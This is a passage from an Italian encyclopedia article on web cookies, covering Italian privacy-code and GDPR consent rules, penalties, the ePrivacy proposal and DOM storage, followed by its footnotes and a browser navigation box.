e) che la prosecuzione della navigazione comporta la prestazione del consenso all'uso dei cookie.

Al banner di informativa breve deve essere poi collegato un Cookie tecnico che permetta di tenere traccia del consenso dell'utente per le successive navigazioni sul medesimo sito internet.

Attraverso il banner di informativa, e attraverso i riferimenti in calce ad ogni pagina del sito, l'utente deve quindi poter accedere all'informativa estesa (la cosiddetta cookie policy ) che deve contenere tutti gli elementi previsti dall'art. 13 del Codice ^[17] , descrivere in maniera specifica e analitica le caratteristiche le finalità dei Cookie installati dal sito, consentire all'utente di selezionare o deselezionare i singoli cookie, contenere i link aggiornati alle informative e ai moduli di consenso delle terze parti con le quali l'editore ha stipulato accordi per l'installazione di Cookie tramite il proprio sito. Qualora l'editore abbia contatti indiretti con le terze parti, dovrà inserire i link dei siti che fanno da intermediari tra lui e le stesse terze parti.

L'informativa deve infine richiamare la possibilità per l'utente di manifestare le proprie opzioni in merito all'uso dei Cookie da parte del sito anche attraverso le impostazioni del browser, indicando almeno la procedura da eseguire per configurare tali impostazioni.

In caso di omessa o inidonea informativa, oltre che nelle previsioni di cui all'art. 13 del Codice, nel provvedimento è prevista la sanzione amministrativa del pagamento di una somma da seimila a trentaseimila euro (art. 161 del Codice).

L'installazione di Cookie sui terminali degli utenti in assenza del preventivo consenso degli stessi comporta, invece, la sanzione del pagamento di una somma da diecimila a centoventimila euro (art. 162, comma 2-bis, del Codice) ^[18]

L'omessa o incompleta notifica al Garante da parte di soggetti che utilizzano Cookie di 'profilazione' comporta una sanzione da venti mila a centoventi mila euro (art. 163 del Codice). Esclusi da tale obbligo sono coloro che non utilizzano direttamente i cookie di 'profilazione':

-siti che trasmettono cookie di 'profilazione' di "terze parti";

-siti che utilizzano direttamente cookie tecnici.

Il garante ha altresì fornito in merito ai casi in cui sia necessaria la notifica ulteriori chiarimenti nel documento web n. 993385 .

In merito ai chiarimenti richiesti sull'ambito di applicazione della normativa in materia di cookie ^[19] , si evidenzia che la stessa riguarda tutti i siti che, a prescindere dalla presenza di una sede nel territorio dello Stato, installano cookie sui terminali degli utenti, utilizzando quindi per il trattamento "strumenti situati sul territorio dello Stato" (cfr. art. 5, comma 2, del Codice privacy ^[20] ).

Dal 25 maggio 2018 la regolamentazione sui cookie è prescritta dal GDPR (vedi paragrafo).

La nuova legislazione europea: il GDPR

Dal 25 maggio 2018 è applicato il regolamento generale sulla protezione dei dati (GDPR, General Data Protection Regulation- Regolamento UE 2016/679) . Il GDPR sostituisce l'attuale legge italiana sulla protezione dei dati (ufficialmente Direttiva 95/46/EC) ^[21] e abroga le norme del Codice per la protezione dei dati personali (dlgs.n. 196/2003) che risulteranno con esso incompatibili. Pertanto, gli articoli del codice italiano che non siano specificatamente coperti dal GDPR rimangono in vigore (a meno di futuri provvedimenti legislativi).

Secondo la Commissione Europea "i dati personali sono qualunque informazione relativa a un individuo, collegata alla sua vita sia privata, sia professionale o pubblica. Può riguardare qualunque dato personale: nomi, foto, indirizzi email, dettagli bancari, interventi su siti web di social network, informazioni mediche o indirizzi IP di computer." ^[22]

Per questo anche i cookie devono essere trattati come dati personali e devono essere gestiti come segue:

I dati personali non possono essere tracciati o usati prima che l'utente abbia dato il consenso esplicito;
Devono essere specificati tutti i tracciamenti dei dati personali su tutte le pagine/URLs del sito coinvolte;
Gli utenti del sito devono essere informati in un linguaggio semplice su:
- Chi riceve i loro dati e come sono usati;
- La data di scadenza dei cookie;
Ogni autorizzazione deve essere salvata/registrata per provare alle autorità che è stata concessa ( Formato della prova );
La revoca del consenso deve essere facile da fare, anche in un secondo momento. ^[23] ^[24]

Inoltre la cookie policy deve contenere la lista di tutti i cookie presenti su tutte le pagine del sito e per ognuno di essi: chi riceve i dati, per cosa sono utilizzati e la data di scadenza.

Nel gennaio 2017 la Commissione Europea propose un'alternativa ^[25] volta a semplificare l'esperienza online, auspicando che siano gli stessi browser a poter gestire le preferenze degli utenti per il consenso/rifiuto dei cookie – eliminando quindi la necessità di gestire le singole accettazione dei cookie nei singoli siti. Questa proposta non ha avuto seguiti ed è stata molto criticata e giudicata non fattibile. ^[26] ^[27]

Tecnicamente i browser non riescono a leggere lo scopo di un cookie (come viene utilizzato) e non possono fornire una sua descrizione in un “linguaggio semplice” così come è richiesto nel GDPR. Inoltre i browser non possono registrare tutti i cookie presenti in un intero sito, ma solo uno per volta per pagina singola. I browser non possono gestire consensi differenti in base ai diversi siti (per cui sarebbe un'accettazione di tutti i cookie o di nessuno) e non possono inoltre fornire il Formato della prova (il salvataggio dei consensi) così come richiesto dal GDPR. Alla luce di nessun nuovo sviluppo di questa proposta da parte della Commissione Europea , i gestori dei siti web dovranno attenersi a quanto richiesto dal GDPR.

Cosa cambia rispetto alla legislazione attuale

Nel caso di un sito con la presenza di soli cookie tecnici/funzionali (shopping cart, selezione lingua, preferenze) e/o di cookie di statistica di prima parte (es. Matomo e simili): rimane tutto come è ora e quindi non è necessario avere un cookie banner, il blocco preventivo dei cookie prima del consenso e il salvataggio dei consensi ( formato della prova) .

In questo caso rientrano anche i cookie di statistica di terza parte come Google Analytics con IP anonimizzato in modo tale che non possa essere ricostruito l'indirizzo IP con tecniche di “reverse engineering”. Utilizzando Google Analytics bisogna quindi disattivare la condivisione dei dati con gli altri prodotti/servizi Google ^[28] , altrimenti si rientra nel caso successivo.

Nel caso di presenza di altri tipi di cookie, e quindi quelli pubblicitari (Google Adsense, DoubleClick, retargeting, ecc) e tutti gli altri di terze parti (Social Network, YouTube, ecc) oltre al cookie banner il GDPR richiede:

il consenso esplicito ( opt-in ) e quindi non più implicito come ad esempio "scrollare" la pagina;
il blocco preventivo dei cookie prima del consenso;
la registrazione dei log del consenso da fornire come “prova”;
la descrizione per ogni cookie che comprende chi riceve i dati, per quale scopo e la data di scadenza;
la possibilità di revocare il consenso in modo semplice anche in un secondo momento.

Tecnologie analoghe

Nel mondo del web storage esiste anche il DOM storage ^[29] ^[30] che è una tipologia di contenuti evoluti che ha funzioni simili ai cookie. In pratica, è un cookie articolato e complesso. Ogni sistema operativo, mediante il browser, archivia le informazioni memorizzate dai siti web visitati che alimentano il DOM storage (detto anche Web Storage ) ^[31] che può essere disabilitato e/o cancellato esattamente come i cookie. Oltre ai cookie i browser hanno un'opzione per abilitare o disabilitare l'archiviazione del dom storage dei siti web che lo richiedono ^[32] .

Note

^ Cookie generalmente significa "biscottino" in inglese, in particolare è un biscotto al burro con gocce di cioccolato tipico della cultura statunitense, ma il termine viene usato in questo caso per riferirsi ai biscottini per animali domestici, e più in generale col significato di "piccolo premio".
^ ( EN ) Tim Jackson, This bug in your PC is a smart cookie , in Financial Times , 12 Feb 1996 - #12 (archiviato dall'originale ) urlarchivio richiede url ( aiuto ) .
^ Gmail cookie stolen via Google Spreadsheets , su CNET . URL consultato il 12 maggio 2016 .
^ What about the "EU Cookie Directive" , su Web Cookies Scanner . URL consultato il 12 maggio 2016 .
^ New net rules set to make cookies crumble , su BBC News . URL consultato il 12 maggio 2016 .
^ ( EN ) Cookies and privacy , su europarl.europa.eu . URL consultato il 28 maggio 2016 .
^ ( EN ) Sessions and security , su php.net . URL consultato il 28 maggio 2016 (archiviato dall' url originale il 29 gennaio 2016) .
^ http://www.youronlinechoices.com/it/a-proposito
^ 'SameSite' cookie attribute - Chrome Platform Status , su www.chromestatus.com . URL consultato il 7 maggio 2016 .
^ Learn more about the Public Suffix List , su publicsuffix.org . URL consultato il 24 maggio 2016 .
^ Sul web si trovano facilmente pagine che indicano i percorsi di archiviazione dei cookie per ogni caso.
^ http://www.normattiva.it/atto/caricaArticolo?art.progressivo=0&art.idArticolo=122&art.versione=2&art.codiceRedazionale=003G0218&art.dataPubblicazioneGazzetta=2003-07-29&atto.tipoProvvedimento=DECRETO%20LEGISLATIVO&art.idGruppo=36&art.idSottoArticolo1=10&art.idSottoArticolo=1&art.flagTipoArticolo=0#art
^ Direttiva 2009-136-CE - Garante Privacy , su www.garanteprivacy.it . URL consultato il 10 gennaio 2016 .
^ Cookies a prova di privacy: le modifiche introdotte dal D.Lgs. 69/12 (1ª Parte) | CINDI
^ Individuazione delle modalità semplificate per l'informativa e... - Garante Privacy , su garanteprivacy.it . URL consultato il 10 gennaio 2016 (archiviato dall' url originale il 10 gennaio 2016) .
^ Internet: Garante privacy, no ai cookie per profilazione senza consenso - Garante Privacy , su garanteprivacy.it . URL consultato il 10 gennaio 2016 (archiviato dall' url originale il 10 gennaio 2016) .
^ Codice in materia di protezione dei dati personali [Testo consolidato... - Garante Privacy , su garanteprivacy.it . URL consultato il 10 gennaio 2016 (archiviato dall'url originale il 13 gennaio 2016) .
^ Le nuove regole in materia di Cookie , su ict4executive.it . URL consultato il 26 maggio 2015 (archiviato dall' url originale il 26 maggio 2015) .
^ Chiarimenti in merito all'attuazione della normativa in materia di cookie - Garante Privacy , su garanteprivacy.it . URL consultato il 10 gennaio 2016 (archiviato dall' url originale l'8 gennaio 2016) .
^ Codice in materia di protezione dei dati personali [Testo consolidato... - Garante Privacy , su garanteprivacy.it . URL consultato il 10 gennaio 2016 (archiviato dall' url originale il 13 gennaio 2016) .
^ Direttiva 95/46/CE , su eur-lex.europa.eu .
^ European Commission's press release announcing the proposed comprehensive reform of data protection rules , su europa.eu .
^ Implicazioni del GDPR sulla gestione dei cookie (in inglese) ( PDF ), su onetrust.com .
^ Implicazioni del GDPR sulla gestione dei cookie (in inglese) ^{[ collegamento interrotto ]} , su ittrust.eu .
^ Proposta ePrivacy , su ec.europa.eu .
^ Posizione IAB Europe ( PDF ), su iabeurope.eu . URL consultato il 3 gennaio 2018 (archiviato dall' url originale il 4 gennaio 2018) .
^ Critica proposta ePrivacy (in inglese) , su adversitement.com . URL consultato il 3 gennaio 2018 (archiviato dall' url originale il 4 gennaio 2018) .
^ Come disattivare la condivisione dei dati su Google Analyitcs , su iubenda.com .
^ Document Object Model storage
^ http://www.matarrelli.com/w3c/cose-il-dom-storage
^ HTML5 Web Storage.(
^ https://www.isunshare.com/blog/enable-dom-storage-in-ie-ff-google-chrome-windows-10/

Voci correlate

Altri progetti

Wikimedia Commons contiene immagini o altri file su cookie

Collegamenti esterni

Manuale - Breve spiegazione di come abilitare i cookie nei vari browser e sistemi operativi
Controlla le tue informazioni registrate dai "Flash Cookie" , su abtechno.org .
Attacco ai Cookie - Descrizione e Contromisure della tecnica di Hacking Cookie Manipulation

Portale Informatica	Portale Internet
Portale Telecomunicazioni	Portale Telematica

[1] Cookie generalmente significa "biscottino" in inglese, in particolare è un biscotto al burro con gocce di cioccolato tipico della cultura statunitense, ma il termine viene usato in questo caso per riferirsi ai biscottini per animali domestici, e più in generale col significato di "piccolo premio".

[2] ( EN ) Tim Jackson, This bug in your PC is a smart cookie , in Financial Times , 12 Feb 1996 - #12 (archiviato dall'originale ) urlarchivio richiede url ( aiuto ) .

[3] Gmail cookie stolen via Google Spreadsheets , su CNET . URL consultato il 12 maggio 2016 .

[4] What about the "EU Cookie Directive" , su Web Cookies Scanner . URL consultato il 12 maggio 2016 .

[5] New net rules set to make cookies crumble , su BBC News . URL consultato il 12 maggio 2016 .

[6] ( EN ) Cookies and privacy , su europarl.europa.eu . URL consultato il 28 maggio 2016 .

[7] ( EN ) Sessions and security , su php.net . URL consultato il 28 maggio 2016 (archiviato dall' url originale il 29 gennaio 2016) .

[8] ttp://www.youronlinechoices.com/it/a-proposito

[9] 'SameSite' cookie attribute - Chrome Platform Status , su www.chromestatus.com . URL consultato il 7 maggio 2016 .

[10] Learn more about the Public Suffix List , su publicsuffix.org . URL consultato il 24 maggio 2016 .

[11] Sul web si trovano facilmente pagine che indicano i percorsi di archiviazione dei cookie per ogni caso.

[12] ttp://www.normattiva.it/atto/caricaArticolo?art.progressivo=0&art.idArticolo=122&art.versione=2&art.codiceRedazionale=003G0218&art.dataPubblicazioneGazzetta=2003-07-29&atto.tipoProvvedimento=DECRETO%20LEGISLATIVO&art.idGruppo=36&art.idSottoArticolo1=10&art.idSottoArticolo=1&art.flagTipoArticolo=0#art

[13] Direttiva 2009-136-CE - Garante Privacy , su www.garanteprivacy.it . URL consultato il 10 gennaio 2016 .

[14] Cookies a prova di privacy: le modifiche introdotte dal D.Lgs. 69/12 (1ª Parte) | CINDI

[15] Individuazione delle modalità semplificate per l'informativa e... - Garante Privacy , su garanteprivacy.it . URL consultato il 10 gennaio 2016 (archiviato dall' url originale il 10 gennaio 2016) .

[16] Internet: Garante privacy, no ai cookie per profilazione senza consenso - Garante Privacy , su garanteprivacy.it . URL consultato il 10 gennaio 2016 (archiviato dall' url originale il 10 gennaio 2016) .

[17] Codice in materia di protezione dei dati personali [Testo consolidato... - Garante Privacy , su garanteprivacy.it . URL consultato il 10 gennaio 2016 (archiviato dall'url originale il 13 gennaio 2016) .

[18] Le nuove regole in materia di Cookie , su ict4executive.it . URL consultato il 26 maggio 2015 (archiviato dall' url originale il 26 maggio 2015) .

[19] Chiarimenti in merito all'attuazione della normativa in materia di cookie - Garante Privacy , su garanteprivacy.it . URL consultato il 10 gennaio 2016 (archiviato dall' url originale l'8 gennaio 2016) .

[20] Codice in materia di protezione dei dati personali [Testo consolidato... - Garante Privacy , su garanteprivacy.it . URL consultato il 10 gennaio 2016 (archiviato dall' url originale il 13 gennaio 2016) .

[21] Direttiva 95/46/CE , su eur-lex.europa.eu .

[22] European Commission's press release announcing the proposed comprehensive reform of data protection rules , su europa.eu .

[23] Implicazioni del GDPR sulla gestione dei cookie (in inglese) ( PDF ), su onetrust.com .

[24] Implicazioni del GDPR sulla gestione dei cookie (in inglese) ^{[ collegamento interrotto ]} , su ittrust.eu .

[25] Proposta ePrivacy , su ec.europa.eu .

[26] Posizione IAB Europe ( PDF ), su iabeurope.eu . URL consultato il 3 gennaio 2018 (archiviato dall' url originale il 4 gennaio 2018) .

[27] Critica proposta ePrivacy (in inglese) , su adversitement.com . URL consultato il 3 gennaio 2018 (archiviato dall' url originale il 4 gennaio 2018) .

[28] Come disattivare la condivisione dei dati su Google Analyitcs , su iubenda.com .

[29] Document Object Model storage

[30] ttp://www.matarrelli.com/w3c/cose-il-dom-storage

[31] HTML5 Web Storage.(

[32] ttps://www.isunshare.com/blog/enable-dom-storage-in-ie-ff-google-chrome-windows-10/

[1]

[2]

[3]

[4]

[5]

[6]

[7]

[8]

[9]

[10]

[11]

[12]

[13]

[14]

[15]

[16]

[17]

[18]

[19]

[20]

[21]

[22]

[23]

[24]

[25]

[26]

[27]

[28]

[29]

[30]

[31]

[32]

V ·D · M Browser Internet
Caratteristiche · standard · protocolli
Caratteristiche	Segnalibri · Estensioni · Navigazione privata · Sincronizzazione
Standard	HTML ( v5 ) · CSS · DOM · JavaScript ( IndexedDB · Web storage · WebAssembly · WebGL )
Protocolli	HTTP ( v2 · v3 · Cookies · Crittografia ) · OCSP · WebRTC · WebSocket
Attivi
Basati su Blink	Avast Secure Browser · Beaker · Blisk · Brave · Chrome · Chromium · Cốc Cốc · Dragon · Edge · Epic · Falkon · Kinza · Maxthon · Opera · Otter · Puffin · SalamWeb · Samsung Internet · Silk · Sleipnir · Sputnik · SRWare · Torch · UC · Vivaldi · Whale · Yandex
Basati su Gecko	Firefox ( per Android ) · GNU IceCat · IceDragon · K-Meleon · PirateBrowser · SeaMonkey · SlimBrowser · TenFourFox · Tor · Waterfox
Basati su WebKit	Dolphin · Dooble · Firefox per iOS · GNOME Web · iCab · Konqueror · Midori · Safari · surf
Altro	360 · Avant · Basilisk · Cake Browser · CM Browser · eww · Internet Explorer · Links · Lunascape · Lynx · NetFront · NetSurf · Pale Moon · QQ browser · qutebrowser · w3m · WebbIE
Inattivi
Basati su Gecko	Beonex Communicator · Camino · Classilla · Conkeror · Galeon · Ghostzilla · Kazehakase · Kylo · Lotus · MicroB · Minimo · Mozilla suite · Pogo · Strata · Swiftfox · Swiftweasel · Timberwolf · xB
Basati su Trident	AOL · Deepnet · GreenBrowser · MediaBrowser · MenuBox · NeoPlanet · NetCaptor · SpaceTime · UltraBrowser · ZAC
Basati su WebKit	Arora · BOLT · Opera Coast · Flock · Fluid · Google TV · Iris · Mercury · OmniWeb · Origyn · QtWeb · rekonq · RockMelt · Shiira · Steel · Browser for Symbian · Uzbl · WebPositive · xombrero
Altro	abaco · Amaya · Arachne · Arena · Blazer · Charon · Deepfish · Dillo · ELinks · Gazelle · HotJava · IBM Home Page Reader · IBM WebExplorer · IBrowse · KidZui · Line Mode · Mosaic · MSN TV · NetPositive · Netscape · Skweezer · Skyfire · Teashark · ThunderHawk · Vision · WinWAP · WorldWideWeb
Categoria · Diffusione